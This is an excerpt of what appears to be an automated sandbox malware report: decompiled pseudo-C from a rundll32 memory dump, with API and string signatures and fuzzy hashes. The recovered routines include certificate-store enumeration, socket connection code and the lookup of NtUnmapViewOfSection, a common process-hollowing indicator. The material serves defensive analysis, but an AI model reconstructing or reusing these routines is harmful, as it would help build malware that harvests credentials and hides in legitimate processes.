                                        				if (r15d != 0) goto 0xf2fefc26;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xf2fefc26;
                                        				 *(_t190 + 7) = GetLastError();
                                        				goto 0xf2fefc2a;
                                        				 *(_t190 + 7) = r13d;
                                        				E0000021E21EF310D880( *((intOrPtr*)(_t184 + 0x28)), _t156);
                                        				 *(_t190 + 0xf) = _t208;
                                        				asm("movups xmm0, [ebp+0x7]");
                                        				asm("inc ecx");
                                        				return 0;
                                        			}

























                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalErrorLastSection$CompletionEnterInit_thread_footerLeaveQueuedStatusTimerWaitable
                                        • String ID:
                                        • API String ID: 228527383-0
                                        • Opcode ID: 6947ace0cee9fec1c1bfd1419755eabfcfea334807307d32711a9a76499f9b76
                                        • Instruction ID: 52bc9a01765067e6e26a39b67b2399b4d0c01d452f353c8c0d858795ed900e8e
                                        • Opcode Fuzzy Hash: 6947ace0cee9fec1c1bfd1419755eabfcfea334807307d32711a9a76499f9b76
                                        • Instruction Fuzzy Hash: 55A16673611B419AEB15CF25E9443ED33A0F768BA8F058225DE4967F58EF34C5A6C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E0000021E21EF2FEF1F0(signed int __esi, long long __rbx, long long __rcx, long long __rdx, long long __rbp) {
                                        				void* _v24;
                                        				intOrPtr _v180;
                                        				char _v184;
                                        				long long _v200;
                                        				long long _v208;
                                        				void* _v216;
                                        				void* __rdi;
                                        				void* _t43;
                                        				void* _t44;
                                        				long _t45;
                                        				void* _t46;
                                        				void* _t54;
                                        				signed int _t56;
                                        				intOrPtr _t58;
                                        				void* _t59;
                                        				void* _t65;
                                        				long _t82;
                                        				long long _t83;
                                        				longlong _t85;
                                        				void* _t89;
                                        				void* _t92;
                                        				struct _OSVERSIONINFOEXA* _t95;
                                        
                                        				_t65 = _t89;
                                        				 *((long long*)(_t65 + 8)) = __rcx;
                                        				_v200 = 0xfffffffe;
                                        				 *((long long*)(_t65 + 0x10)) = __rbx;
                                        				 *((long long*)(_t65 + 0x18)) = __rbp;
                                        				_t58 = r8d;
                                        				_t83 = __rcx;
                                        				 *((long long*)(__rcx)) = 0xf31b16b0;
                                        				r14d = 0;
                                        				 *(__rcx + 8) = _t95;
                                        				 *(__rcx + 0x10) = _t95;
                                        				 *((long long*)(__rcx + 0x18)) = __rdx;
                                        				 *(__rcx + 0x20) = _t95;
                                        				 *((long long*)(__rcx)) = 0xf31b12b8;
                                        				 *((long long*)(__rcx)) = 0xf31b1d78;
                                        				 *(__rcx + 0x28) = _t95;
                                        				 *(__rcx + 0x30) = _t95;
                                        				 *(__rcx + 0x38) = _t95;
                                        				r8d = 0x9c;
                                        				E0000021E21EF310E410(_t46, 0, _t54, _t59,  &_v184, __rdx, __rcx, _t92);
                                        				_v184 = 0x9c;
                                        				_v180 = 6;
                                        				r8b = 3;
                                        				__imp__VerSetConditionMask();
                                        				VerifyVersionInfoA(_t95, _t82, _t85);
                                        				_t56 = __esi | 0xffffffff;
                                        				_t49 =  !=  ? _t56 : 0x1f4;
                                        				 *((intOrPtr*)(_t83 + 0x40)) =  !=  ? _t56 : 0x1f4;
                                        				 *(_t83 + 0x48) = _t95;
                                        				 *(_t83 + 0x50) = _t95;
                                        				 *((intOrPtr*)(_t83 + 0x58)) = r14d;
                                        				_t22 = _t83 + 0x60; // 0x60
                                        				_t44 = E0000021E21EF2FEE990();
                                        				E0000021E21EF310D880(_t22, __rdx);
                                        				_v216 = _t44;
                                        				_v208 = 0xf31b1d78;
                                        				if (_t44 == 0) goto 0xf2fef2e4;
                                        				0xf2fee680();
                                        				 *(_t83 + 0x88) = _t95;
                                        				 *(_t83 + 0x90) = _t95;
                                        				 *(_t83 + 0x98) = _t95;
                                        				 *((intOrPtr*)(_t83 + 0xa0)) = _t58;
                                        				_t57 =  >=  ? _t58 : _t56;
                                        				r9d =  >=  ? _t58 : _t56;
                                        				r8d = 0;
                                        				CreateIoCompletionPort(??, ??, ??, ??);
                                        				 *((long long*)(_t83 + 0x28)) = 0xf31b1d78;
                                        				if (0xf31b1d78 != 0) goto 0xf2fef34b;
                                        				_t45 = GetLastError();
                                        				_t43 = E0000021E21EF310D880( &_v216 | 0xffffffff, "mutex");
                                        				_v216 = _t45;
                                        				_v208 = 0xf31b1d78;
                                        				if (_t45 == 0) goto 0xf2fef34b;
                                        				0xf2fee680();
                                        				return _t43;
                                        			}


























                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$CompletionConditionCountCreateCriticalExceptionInfoInit_thread_footerInitializeMaskPortSectionSpinThrowVerifyVersion__std_exception_copy
                                        • String ID: iocp$mutex
                                        • API String ID: 4133264258-1266449624
                                        • Opcode ID: 0f3bd768da0e5ea16eea640437c9dd5bd4120e7c3742766c5626e02ab0ce0fa6
                                        • Instruction ID: 4990b4e04b6ab192c429ccf434b97bcd6401c95aa75349e0fc4a7bb241a834f3
                                        • Opcode Fuzzy Hash: 0f3bd768da0e5ea16eea640437c9dd5bd4120e7c3742766c5626e02ab0ce0fa6
                                        • Instruction Fuzzy Hash: 93417932210B8096EB24CF25E88428A73F4F758764F624329DFA853BA4EF79C567C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Store$CertificatesEnum$CertificateCloseContextFreeOpen
                                        • String ID: Certificate %d$Listing certs for store %s
                                        • API String ID: 598586232-3674431298
                                        • Opcode ID: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction ID: ef8ae8719400be1a7f3385bc0181bc0e2ed3176f5a1fd5b5ab6f989b43623493
                                        • Opcode Fuzzy Hash: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction Fuzzy Hash: 47218371301B8045EE55AB17AD583DBA6A1ABA9FC0F1A84369D0E07F56EE3CC413C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF3018890(signed int __edx, void* __eflags, void* __rcx) {
                                        				void* _v72;
                                        				signed char _t8;
                                        				signed int _t10;
                                        
                                        				_t10 = __edx & 0x00000017;
                                        				 *(__rcx + 0x10) = _t10;
                                        				_t8 =  *(__rcx + 0x14) & _t10;
                                        				if (__eflags == 0) goto 0xf30188b5;
                                        				if (r8b != 0) goto 0xf30188ba;
                                        				if ((_t8 & 0x00000004) != 0) goto 0xf30188c4;
                                        				if ((_t8 & 0x00000002) != 0) goto 0xf30188ef;
                                        				goto 0xf301891a;
                                        				return _t8;
                                        			}







                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 432778473-1866435925
                                        • Opcode ID: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction ID: 9d5baa3a45008d461a11b5819297ab40aa4f5c02c085f0a6f515d7554cd83da3
                                        • Opcode Fuzzy Hash: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction Fuzzy Hash: 9D11603122154592FE54BB14DC59BDF23A1FBB0744F864413AD4A0BCABEE6CCA07C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: NtUnmapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-3998908438
                                        • Opcode ID: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction ID: 033fac6c5f0a036075b3bc244c69a1b3263d5c526e07620d431f2c8034a4c106
                                        • Opcode Fuzzy Hash: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction Fuzzy Hash: 66F0F471705A4185EE04EB12FC5819AA7B0BBA9FD0F498036AE4E47B29EE3CD496C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerSocket
                                        • String ID:
                                        • API String ID: 3979501240-0
                                        • Opcode ID: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction ID: 195ec58af3b9b85db95d91d4b23e52eedd86d1ae982e6179df20ee4a767abb9b
                                        • Opcode Fuzzy Hash: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction Fuzzy Hash: 90516E32A14B918AEB108F74EC492DD27B0F365768F029315DF6912EDADB78D1D6C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastModuleNamePointerRead
                                        • String ID:
                                        • API String ID: 1442449144-0
                                        • Opcode ID: 37b822aaf9dc0f329d9b56b3dd7b6b678b972d3cfd7c9e27a8f7042b5c71e470
                                        • Instruction ID: e6a62df36e66dd01c978a74c3e0875b0bd879498cc67a1413c5b90b447ff61ac
                                        • Opcode Fuzzy Hash: 37b822aaf9dc0f329d9b56b3dd7b6b678b972d3cfd7c9e27a8f7042b5c71e470
                                        • Instruction Fuzzy Hash: A841033260065147EF60AB55AD087EFA3A5BB64BD0F469221DE4803FC6EF7CC81AC784
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                        			E0000021E21EF2FF3000(intOrPtr __eax, void* __ebx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, intOrPtr* __r9, intOrPtr _a8, long long _a16, long long _a24, char _a32) {
                                        				long long _v32;
                                        				intOrPtr _v40;
                                        				long long _v56;
                                        				intOrPtr _t26;
                                        				intOrPtr _t31;
                                        				intOrPtr _t32;
                                        				void* _t34;
                                        				intOrPtr _t40;
                                        				intOrPtr _t41;
                                        				long long _t52;
                                        				long long _t53;
                                        				void* _t77;
                                        
                                        				_t52 = __rax;
                                        				_a16 = __rbx;
                                        				_a24 = __rsi;
                                        				_t77 = __rcx;
                                        				if (__rcx != 0xffffffff) goto 0xf2ff3030;
                                        				_v40 = 0x2719;
                                        				goto 0xf2ff306c;
                                        				__imp__#112();
                                        				r8d = __ebx;
                                        				_t64 = __rdx;
                                        				_t60 = __rcx;
                                        				__imp__#4();
                                        				_t40 = __eax;
                                        				_t26 = E0000021E21EF310D880(__rcx, __rdx);
                                        				__imp__#111();
                                        				_v32 = _t52;
                                        				_v40 = _t26;
                                        				asm("movups xmm0, [ebp-0x10]");
                                        				asm("movups [esi], xmm0");
                                        				if (_t40 != 0) goto 0xf2ff307c;
                                        				_v40 = _t40;
                                        				E0000021E21EF310D880(_t60, __rdx);
                                        				_v32 = _t52;
                                        				asm("movups xmm0, [ebp-0x10]");
                                        				asm("movups [esi], xmm0");
                                        				E0000021E21EF310D880(_t60, __rdx);
                                        				if ( *((intOrPtr*)(__r9 + 8)) != _t52) goto 0xf2ff308f;
                                        				if ( *__r9 == 0x2734) goto 0xf2ff30aa;
                                        				E0000021E21EF310D880(_t60, __rdx);
                                        				if ( *((intOrPtr*)(__r9 + 8)) != _t52) goto 0xf2ff315a;
                                        				if ( *__r9 != 0x2733) goto 0xf2ff315a;
                                        				if (E0000021E21EF2FF3780(__ebx, _t52, _t52, _t77, __r9) < 0) goto 0xf2ff315a;
                                        				_a8 = 0;
                                        				if (_t77 != 0xffffffff) goto 0xf2ff30d8;
                                        				_v40 = 0x2719;
                                        				_t31 = E0000021E21EF310D880(_t77, _t64);
                                        				goto 0xf2ff314f;
                                        				__imp__#112();
                                        				_t53 =  &_a32;
                                        				_a32 = 4;
                                        				_v56 = _t53;
                                        				r8d = 0x1007;
                                        				__imp__#7();
                                        				_t41 = _t31;
                                        				_t32 = E0000021E21EF310D880(_t77, _t64);
                                        				__imp__#111();
                                        				_v32 = _t53;
                                        				_v40 = _t32;
                                        				asm("movups xmm0, [ebp-0x10]");
                                        				asm("movups [esi], xmm0");
                                        				if (_t41 != 0) goto 0xf2ff313f;
                                        				_v40 = _t41;
                                        				E0000021E21EF310D880(_t77, _t64);
                                        				_v32 = _t53;
                                        				asm("movups xmm0, [ebp-0x10]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf2ff3144;
                                        				if (_t41 == 0xffffffff) goto 0xf2ff315a;
                                        				_t34 = E0000021E21EF310D880(_t77, _t64);
                                        				_v40 = _a8;
                                        				_v32 = _t53;
                                        				asm("movups xmm0, [ebp-0x10]");
                                        				asm("movups [esi], xmm0");
                                        				return _t34;
                                        			}
















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerconnectgetsockopt
                                        • String ID:
                                        • API String ID: 1723522097-0
                                        • Opcode ID: cf31bf95f18af37386febb36bc9668673220a96959e16307ef7f0ed0195419d3
                                        • Instruction ID: b5424a2131182549d4847ed1de8a6b08b567b931801899efa0dfbb23d80a1a2d
                                        • Opcode Fuzzy Hash: cf31bf95f18af37386febb36bc9668673220a96959e16307ef7f0ed0195419d3
                                        • Instruction Fuzzy Hash: 0F416072E00B818AFB109F74EC482ED66B0B765768F028715DEA926FD5DB3C81D68340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 42%
                                        			E0000021E21EF3008100(void* __ebx, void* __edx, long long __rbx, long long __rcx, signed char** __rdx, long long __rsi, signed char* __r8, signed char* _a16, void* _a40, signed char** _a48, intOrPtr* _a56) {
                                        				void* _v40;
                                        				char _v104;
                                        				char _v168;
                                        				char _v256;
                                        				char _v272;
                                        				char _v280;
                                        				signed char* _v288;
                                        				long long _v296;
                                        				char _v304;
                                        				char _v312;
                                        				signed char* _v320;
                                        				signed char* _v328;
                                        				signed char* _v336;
                                        				signed char* _v344;
                                        				signed char* _v352;
                                        				signed char* _v360;
                                        				signed char* _v368;
                                        				signed char* _v376;
                                        				void* __rdi;
                                        				signed int _t92;
                                        				signed int _t101;
                                        				signed int _t104;
                                        				signed int _t112;
                                        				void* _t115;
                                        				signed int _t117;
                                        				signed int _t118;
                                        				signed int _t119;
                                        				signed char* _t160;
                                        				signed char* _t161;
                                        				signed char* _t166;
                                        				signed char* _t169;
                                        				signed char* _t170;
                                        				signed char* _t181;
                                        				signed char* _t182;
                                        				signed char* _t185;
                                        				signed char* _t186;
                                        				signed char* _t187;
                                        				signed char** _t188;
                                        				signed char* _t193;
                                        				signed char* _t194;
                                        				signed char* _t197;
                                        				char* _t205;
                                        				signed char* _t208;
                                        				signed char* _t211;
                                        				void* _t221;
                                        				void* _t222;
                                        				signed char* _t223;
                                        				signed char* _t224;
                                        				intOrPtr* _t227;
                                        				void* _t229;
                                        				signed char* _t230;
                                        				signed char* _t234;
                                        				void* _t238;
                                        				signed char* _t239;
                                        				signed char* _t240;
                                        				signed char* _t242;
                                        				signed char* _t243;
                                        				void* _t245;
                                        				signed char* _t248;
                                        				void* _t250;
                                        				void* _t251;
                                        				void* _t254;
                                        				signed char* _t255;
                                        
                                        				_t116 = __ebx;
                                        				_t160 = _t230;
                                        				 *((long long*)(_t160 + 8)) = __rcx;
                                        				 *((long long*)(_t160 - 0x108)) = 0xfffffffe;
                                        				 *((long long*)(_t160 + 0x18)) = __rbx;
                                        				 *((long long*)(_t160 + 0x20)) = __rsi;
                                        				_t255 = __r8;
                                        				_t234 =  *__rdx;
                                        				 *__rdx = _t234;
                                        				 *((char*)(_t160 + 8)) = 0;
                                        				if (_t234 - __r8 < 0) goto 0xf300815b;
                                        				E0000021E21EF2FF0490(__rcx, __rdx);
                                        				_v376 = 3;
                                        				_v368 = _t160;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				goto 0xf300861a;
                                        				asm("o16 nop [eax+eax]");
                                        				_t193 =  *__rdx;
                                        				if (( *_t193 & 0x000000ff) != 0x3a) goto 0xf30085da;
                                        				if (_t193 != _t234) goto 0xf30081a0;
                                        				E0000021E21EF2FF0490(_t193, 0xf31b4a90);
                                        				_v376 = 0x11;
                                        				_v368 = _t160;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				goto 0xf300861a;
                                        				_v376 = _t234;
                                        				_t194 = _t193 - _t234;
                                        				_v368 = _t194;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("inc ecx");
                                        				 *__rdx =  &(( *__rdx)[1]);
                                        				_t185 =  *__rdx;
                                        				r13d = 0;
                                        				r14d = r13d;
                                        				_t227 = _a56;
                                        				_t161 =  &(_t185[1]);
                                        				if (_t161 - __r8 <= 0) goto 0xf30081f8;
                                        				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
                                        				_v376 = 3;
                                        				_v368 = _t161;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf3008625;
                                        				_t92 =  *_t185 & 0x000000ff;
                                        				if (_t92 == 0x20) goto 0xf30085ce;
                                        				if (_t92 == 9) goto 0xf30085ce;
                                        				_t223 = _t185;
                                        				if (_t185 - __r8 < 0) goto 0xf3008234;
                                        				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
                                        				_v376 = 3;
                                        				_v368 = _t161;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf30082b2;
                                        				_t117 =  *_t185 & 0x000000ff;
                                        				if (_t194 - 0x20 - 0x5f < 0) goto 0xf30085c6;
                                        				if (_t117 - 0x20 >= 0) goto 0xf300824c;
                                        				if (_t117 != 9) goto 0xf3008255;
                                        				if (_t117 != 0x7f) goto 0xf30085c6;
                                        				if (_t117 != 0xd) goto 0xf30082af;
                                        				_t186 =  &(_t185[1]);
                                        				if (_t186 - __r8 < 0) goto 0xf3008281;
                                        				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
                                        				_v328 = 3;
                                        				_v320 = _t185;
                                        				asm("movups xmm0, [esp+0x50]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf30082b2;
                                        				if ( *_t186 == 0xa) goto 0xf30082a5;
                                        				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
                                        				_v360 = 0xb;
                                        				_v352 = __r8;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf30082b2;
                                        				_t251 = _t186 - 1;
                                        				goto 0xf30082b2;
                                        				_t166 = _t248;
                                        				 *__rdx = _t166;
                                        				if ( *_t227 != r13d) goto 0xf3008625;
                                        				if (_t166 != 0) goto 0xf30082e3;
                                        				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
                                        				_v360 = 0x12;
                                        				_v352 = _t166;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf3008625;
                                        				_t187 =  &(_t166[1]);
                                        				if (_t187 - __r8 <= 0) goto 0xf300830b;
                                        				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
                                        				_v360 = 3;
                                        				_v352 = _t166;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf3008625;
                                        				_t238 = _t251;
                                        				if (_t251 == _t223) goto 0xf300832c;
                                        				_t30 = _t238 - 1; // -1
                                        				_t211 = _t30;
                                        				_t118 =  *_t211 & 0x000000ff;
                                        				if (_t118 == 0x20) goto 0xf3008324;
                                        				if (_t118 != 9) goto 0xf300832c;
                                        				_t239 = _t211;
                                        				if (_t211 != _t223) goto 0xf3008313;
                                        				_a16 = _t239;
                                        				_t119 =  *_t166 & 0x000000ff;
                                        				if (_t119 == 0x20) goto 0xf3008363;
                                        				if (_t119 == 9) goto 0xf3008363;
                                        				_v360 = _t223;
                                        				_t240 = _t239 - _t223;
                                        				_v352 = _t240;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				goto 0xf3008622;
                                        				 *__rdx = _t187;
                                        				if (_t240 == _t223) goto 0xf30081d0;
                                        				_t188 = _a48;
                                        				 *_t188 = _t248;
                                        				_t188[1] = r13b;
                                        				E0000021E21EF300B6D0(__ebx, _t188, _t188,  &(_t188[1]) + _t248, _t223, _t227, _t229, _t223, _t240);
                                        				_t169 =  &(( *__rdx)[1]);
                                        				if (_t169 - __r8 <= 0) goto 0xf30083bd;
                                        				E0000021E21EF2FF0490(_t188,  &(_t188[1]) + _t248);
                                        				_v360 = 3;
                                        				_v352 = _t169;
                                        				asm("movups xmm0, [esp+0x30]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf3008625;
                                        				_t224 =  *__rdx;
                                        				_t101 =  *_t224 & 0x000000ff;
                                        				if (_t101 == 0x20) goto 0xf30085b7;
                                        				if (_t101 == 9) goto 0xf30085b7;
                                        				0xf2ff2bc0(_t250, _t248, _t245, _t222);
                                        				 *__rdx = _t169;
                                        				if ( *_t227 != 0) goto 0xf3008625;
                                        				if (_t169 != 0) goto 0xf300841b;
                                        				E0000021E21EF2FF0490(_t224, __r8);
                                        				_v328 = 0x12;
                                        				_v320 = _t169;
                                        				asm("movups xmm0, [esp+0x50]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf3008625;
                                        				_t170 =  &(_t169[1]);
                                        				if (_t170 - __r8 <= 0) goto 0xf3008442;
                                        				E0000021E21EF2FF0490(_t224, __r8);
                                        				_v376 = 3;
                                        				_v368 = _t170;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [esi], xmm0");
                                        				goto 0xf3008625;
                                        				_t242 = _a16;
                                        				_v288 = _t242;
                                        				if (_t242 == _t224) goto 0xf300846e;
                                        				_t197 = _t242 - 1;
                                        				_t104 =  *_t197 & 0x000000ff;
                                        				if (_t104 == 0x20) goto 0xf3008464;
                                        				if (_t104 != 9) goto 0xf300846e;
                                        				_t243 = _t197;
                                        				_v288 = _t197;
                                        				goto 0xf3008450;
                                        				_a16 = _t243;
                                        				if (_t224 == _t243) goto 0xf3008578;
                                        				if ( *_t188 - 0x1000 < 0) goto 0xf300854f;
                                        				_v312 = 0xf319d200;
                                        				_v304 = 0xf319d200;
                                        				_v296 = 0xf319d200;
                                        				_v280 = "size() >= max_size()";
                                        				_v272 = 1;
                                        				E0000021E21EF310E0E4(_t188,  &_v280,  &_v304, _t224, _t227);
                                        				_v312 = 0xf319d240;
                                        				_v312 = 0xf319d270;
                                        				E0000021E21EF2FFE350(_t188,  &_v168,  &_v312);
                                        				 *0x21EF319D298 = "void __cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::push_back(char)";
                                        				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/static_string.ipp";
                                        				 *0x21EF319D2A8 = 0x19c;
                                        				E0000021E21EF30012E0(0xf319d270,  &_v104);
                                        				E0000021E21EF3001320(_t116, _t188,  &_v256, 0xf319d270, _t227);
                                        				_t205 =  &_v256;
                                        				E0000021E21EF31103EC(_t188, _t205, 0xf31e4b98, _t227, _t254);
                                        				 *_t188 = _t205 + 1;
                                        				 *((char*)(_t205 +  &(_t188[1]))) = 0x20;
                                        				( *_t188)[ &(_t188[1])] = 0;
                                        				_t221 =  &(_t188[1]) +  *_t188;
                                        				E0000021E21EF300B6D0(_t116, _t188, _t188, _t221, _t224, _t227, _t229, _t224, _t243);
                                        				_t112 =  *( *__rdx) & 0x000000ff;
                                        				if (_t112 == 0x20) goto 0xf30085aa;
                                        				if (_t112 == 9) goto 0xf30085aa;
                                        				_t208 =  *_t188;
                                        				_v344 =  &(_t188[1]);
                                        				_v336 = _t208;
                                        				asm("movups xmm0, [esp+0x40]");
                                        				asm("movups [eax], xmm0");
                                        				goto 0xf3008625;
                                        				 *__rdx = _t208 + 1;
                                        				goto 0xf3008392;
                                        				_t181 =  &(_t224[1]);
                                        				 *__rdx = _t181;
                                        				goto 0xf3008625;
                                        				goto 0xf3008210;
                                        				 *__rdx =  &(_t188[0]);
                                        				goto 0xf30081d0;
                                        				if (_t181[_t221] != 0) goto 0xf30085f2;
                                        				E0000021E21EF2FF0490(_t208, _t221);
                                        				_v344 = 0x11;
                                        				goto 0xf3008610;
                                        				_t182 = _t208 + 1;
                                        				 *__rdx = _t182;
                                        				if (_t182 - _t255 < 0) goto 0xf3008170;
                                        				_t115 = E0000021E21EF2FF0490(_t208, _t221);
                                        				_v344 = 3;
                                        				_v336 = _t182;
                                        				asm("movups xmm0, [esp+0x40]");
                                        				asm("movups [eax], xmm0");
                                        				return _t115;
                                        			}

                                        Strings
                                        • void __cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::push_back(char), xrefs: 0000021EF30084FC
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp, xrefs: 0000021EF3008507
                                        • size() >= max_size(), xrefs: 0000021EF30084A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp$size() >= max_size()$void __cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::push_back(char)
                                        • API String ID: 1385522511-3544853855
                                        • Opcode ID: e0ac55e2f2fdeba2ef60c2dc1925d4f5d3a0ea4012792497275840d9e442e911
                                        • Instruction ID: 144b120321d51fa5ad88ba0551f6fe6215e9a09910b7261936013ae5e7f96f8e
                                        • Opcode Fuzzy Hash: e0ac55e2f2fdeba2ef60c2dc1925d4f5d3a0ea4012792497275840d9e442e911
                                        • Instruction Fuzzy Hash: 4FE1B272509B8485EF618F14E8487DEB7A2F3A4748F569212EFC902B99EB7CC1D6C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 23%
                                        			E0000021E21EF30332D8(void* __rax, long long __rbx, void* __rdx, void* __rsi, void* __rbp, long long _a32, long long _a40, void* _a64, void* _a72, void* _a80) {
                                        				long _t15;
                                        				void* _t34;
                                        				intOrPtr* _t44;
                                        				long long _t46;
                                        				char* _t55;
                                        				void* _t60;
                                        
                                        				_t60 = __rbp;
                                        				_t58 = __rsi;
                                        				_t46 = __rbx;
                                        				_t49 = __rbx;
                                        				strchr(??, ??);
                                        				_t36 =  ==  ? 0x11 : 1;
                                        				if (__rax != 0) goto 0xf3033396;
                                        				_t15 = GetLastError();
                                        				_a32 = 0x4a;
                                        				r8d = _t15;
                                        				E0000021E21EF30222D0(__rax + 2, __rax + 1, __rax, __rax, __rbx, __rbx, __rdx, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
                                        				_t44 = "\')";
                                        				_a40 = _t44;
                                        				_t55 = "fopen(\'";
                                        				_a32 = _t46;
                                        				E0000021E21EF3021640(__rax + 5, _t44, _t55, _t60, "\',\'");
                                        				E0000021E21EF3118984(_t44);
                                        				if ( *_t44 == 2) goto 0xf3033370;
                                        				E0000021E21EF3118984(_t44);
                                        				if ( *_t44 == 6) goto 0xf3033370;
                                        				_a32 = 0x53;
